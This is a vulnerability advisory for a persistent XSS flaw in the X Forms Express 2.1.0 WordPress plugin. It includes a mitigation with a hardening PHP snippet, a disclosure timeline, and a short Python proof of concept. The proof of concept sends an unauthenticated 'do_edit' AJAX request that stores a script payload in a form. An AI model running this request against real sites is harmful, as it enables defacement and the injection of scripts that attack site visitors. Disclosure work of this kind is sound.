X Forms Express 2.1.0, Persistent XSS

Due to exposing two AJAX functions to anonymous users by using the ‘nopriv’ method of adding AJAX actions, anonymous users are able to insert new forms, and edit the content of existing forms. Utilizing either of these methods can result in a Persistent XSS attack, defacement of website content, or injection of malicious scripts / iframes.

Homepage

https://wordpress.org/plugins/x-forms-express/

CVSS Score

4

CVSS Vector

(AV:N/AC:L/Au:S/C:P/I:N/A:N)

Attack Scope

remote

Authorization Required

None

Mitigation

Remove the two vulnerable AJAX definitions in the ‘includes/Core/class.db.php’ file, specifically ‘wp_ajax_nopriv_do_insert’ and ‘wp_ajax_nopriv_do_edit’. Inadequate response from vendor – would advise against using this plugin.
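The mitigation above patches the plugin file directly. As an added example (not the plugin's or vendor's code), the following must-use plugin applies the same fix from outside the plugin so it survives plugin updates, and additionally guards the authenticated ‘wp_ajax_do_insert’ / ‘wp_ajax_do_edit’ variants with a capability check. It assumes the plugin registers its hooks on load or on ‘init’ at default priority, that ‘manage_options’ is the right capability for editing forms, and the function name ‘xfe_require_privileges’ is hypothetical.

```php
<?php
/**
 * Plugin Name: Harden X Forms Express AJAX (added example, not vendor code)
 * Description: Drop into wp-content/mu-plugins/ to neutralise the anonymous
 *              do_insert / do_edit AJAX actions described in the advisory.
 */

// 1. Unregister the two anonymous ("nopriv") actions named in the advisory.
//    remove_all_actions() is used because the plugin's callback names are not
//    known here; it detaches whatever function the plugin attached.
//    Hooked very late on 'init': admin-ajax.php fires 'init' before it
//    dispatches any wp_ajax_nopriv_* action, so this runs after the plugin
//    has registered its hooks (assumption: plugin registers on load or on
//    'init' at default priority 10).
add_action('init', function () {
    foreach (array('wp_ajax_nopriv_do_insert', 'wp_ajax_nopriv_do_edit') as $hook) {
        remove_all_actions($hook);
    }
}, PHP_INT_MAX);

// 2. Defence in depth for the logged-in variants: any authenticated user
//    (e.g. a subscriber) can reach wp_ajax_do_edit / wp_ajax_do_insert, so
//    require an administrative capability before the plugin's own handler
//    runs. Priority 0 places this guard ahead of the plugin's callback.
foreach (array('do_insert', 'do_edit') as $action) {
    add_action('wp_ajax_' . $action, 'xfe_require_privileges', 0);
}

/**
 * Hypothetical guard: aborts the AJAX request with HTTP 403 unless the
 * current user may manage site options. wp_send_json_error() calls
 * wp_die(), so the plugin's handler never executes for unprivileged users.
 * A nonce check (check_ajax_referer) belongs in the plugin's handler as well,
 * but can only be enforced once the plugin's JavaScript sends one.
 */
function xfe_require_privileges() {
    if (!current_user_can('manage_options')) {
        wp_send_json_error(
            array('message' => 'insufficient privileges for form editing'),
            403
        );
    }
}
```

Removing the ‘nopriv’ hooks makes the PoC request below receive WordPress's default ‘0’ / 400 response for an unknown anonymous action instead of editing the form.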

Proof of Concept

The following Python script will update the content of the form with the ID of 1 to contain the content specified in the “form_fields” payload field.

import requests

# admin-ajax.php is the WordPress AJAX front controller; no session cookie
# is sent, so the request is handled by the 'nopriv' (anonymous) hook.
url = 'http://localhost/wp-admin/admin-ajax.php'

payload = {
	"action": "do_edit",          # routed to wp_ajax_nopriv_do_edit
	"table": "wap_x_forms",       # plugin table holding the form definitions
	"edit_Id": 1,                 # form whose content is overwritten
	"form_fields": "<script>alert('.');</script>"}  # stored unescaped

r = requests.post(url, data=payload)

Timeline

  • 2014-09-19: Discovered
  • 2014-09-19: Reported to vendor
  • 2014-09-19: CVE requested
  • 2014-09-22: CVE assigned
  • 2014-09-22: Update requested from vendor
  • 2014-09-29: Update requested from vendor
  • 2014-10-02: Response received from vendor requesting more information – link to report provided
  • 2014-10-06: Update requested from vendor
  • 2014-10-07: Response received from vendor – fresh link provided
  • 2014-10-19: Update requested from vendor
  • 2014-10-21: Advisory released